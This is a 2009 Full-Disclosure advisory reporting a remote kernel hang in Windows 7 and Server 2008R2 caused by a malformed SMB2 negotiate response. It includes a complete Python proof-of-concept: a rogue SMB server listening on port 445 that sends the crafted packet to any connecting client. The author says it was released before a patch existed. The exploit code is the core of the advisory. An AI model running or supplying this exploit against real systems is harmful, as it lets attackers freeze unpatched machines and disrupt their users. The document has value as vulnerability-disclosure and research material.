Windows 7 , Server 2008R2 Remote Kernel Crash
From: laurent gaffie <laurent.gaffie () gmail com>
Date: Wed, 11 Nov 2009 05:58:44 -0500
=============================================
- Release date: November 11th, 2009
- Discovered by: Laurent Gaffié
- Severity: Medium/High
=============================================
I. VULNERABILITY
————————-
Windows 7 * , Server 2008R2 Remote Kernel Crash
II. BACKGROUND
————————-
#FAIL,#FAIL,#FAIL
SDL FAIL, ‘Most Secure Os Ever’ –> Remote Kernel in 2 mn.
#FAIL,#FAIL,#FAIL
III. DESCRIPTION
————————-
See : http://g-laurent.blogspot.com/ for much more details
#Comment: This bug is specific Windows 7/2008R2.
IV. PROOF OF CONCEPT
————————-
#win7-crash.py:
#Trigger a remote kernel crash on Win7 and server 2008R2 (infinite loop)
#Crash in KeAccumulateTicks() due to NT_ASSERT()/DbgRaiseAssertionFailure()
caused by an infinite loop.
#NO BSOD, YOU GOTTA PULL THE PLUG.
#To trigger it fast from the target: \\this_script_ip_addr\BLAH , instantly
crash
#Author: Laurent Gaffié
#
import SocketServer
packet = “\x00\x00\x00\x9a” # —> length should be 9e not 9a..
“\xfe\x53\x4d\x42\x40\x00\x00\x00\x00\x00\x00\x00\x00\x00\x01\x00″
“\x01\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00″
“\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00″
“\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00″
“\x41\x00\x01\x00\x02\x02\x00\x00\x30\x82\xa4\x11\xe3\x12\x23\x41″
“\xaa\x4b\xad\x99\xfd\x52\x31\x8d\x01\x00\x00\x00\x00\x00\x01\x00″
“\x00\x00\x01\x00\x00\x00\x01\x00\xcf\x73\x67\x74\x62\x60\xca\x01″
“\xcb\x51\xe0\x19\x62\x60\xca\x01\x80\x00\x1e\x00\x20\x4c\x4d\x20″
“\x60\x1c\x06\x06\x2b\x06\x01\x05\x05\x02\xa0\x12\x30\x10\xa0\x0e”
“\x30\x0c\x06\x0a\x2b\x06\x01\x04\x01\x82\x37\x02\x02\x0a”
class SMB2(SocketServer.BaseRequestHandler):
def handle(self):
print “Who:”, self.client_address
input = self.request.recv(1024)
self.request.send(packet)
self.request.close()
launch = SocketServer.TCPServer((”, 445),SMB2)# listen all interfaces port
445
launch.serve_forever()
#SDL FAILED
V. BUSINESS IMPACT
————————-
An attacker can remotly crash any Windows 7/Server 2008R2.
VI. SYSTEMS AFFECTED
————————-
Windows 7, Windowns Server 2008R2
VII. SOLUTION
————————-
No patch available for the moment, your vendor do not care.
Close SMB feature and ports, until a real audit is provided.
VIII. REFERENCES
————————-
http://g-laurent.blogspot.com/
IX. CREDITS
————————-
This vulnerability has been discovered by Laurent Gaffié
Laurent.gaffie{remove-this}(at)gmail.com
X. REVISION HISTORY
————————-
November 8th, 2009: MSRC contacted
November 8th, 2009: MSRC acknoledge the vuln
November 11th, 2009: MRSC try to convince me that multi-vendor-ipv6 bug
shouldn’t appears on a security bulletin.
November 11th, 2009: Win 7 remote kernel smash released
XI. LEGAL NOTICES
————————-
The information contained within this advisory is supplied “as-is”
with no warranties or guarantees of fitness of use or otherwise.
I accept no responsibility for any damage caused by the use or
misuse of this information.
XII.Personal Notes
————————-
More Remote Kernel FD @MS to come.
_______________________________________________
Full-Disclosure – We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia – http://secunia.com/
没有评论 ▼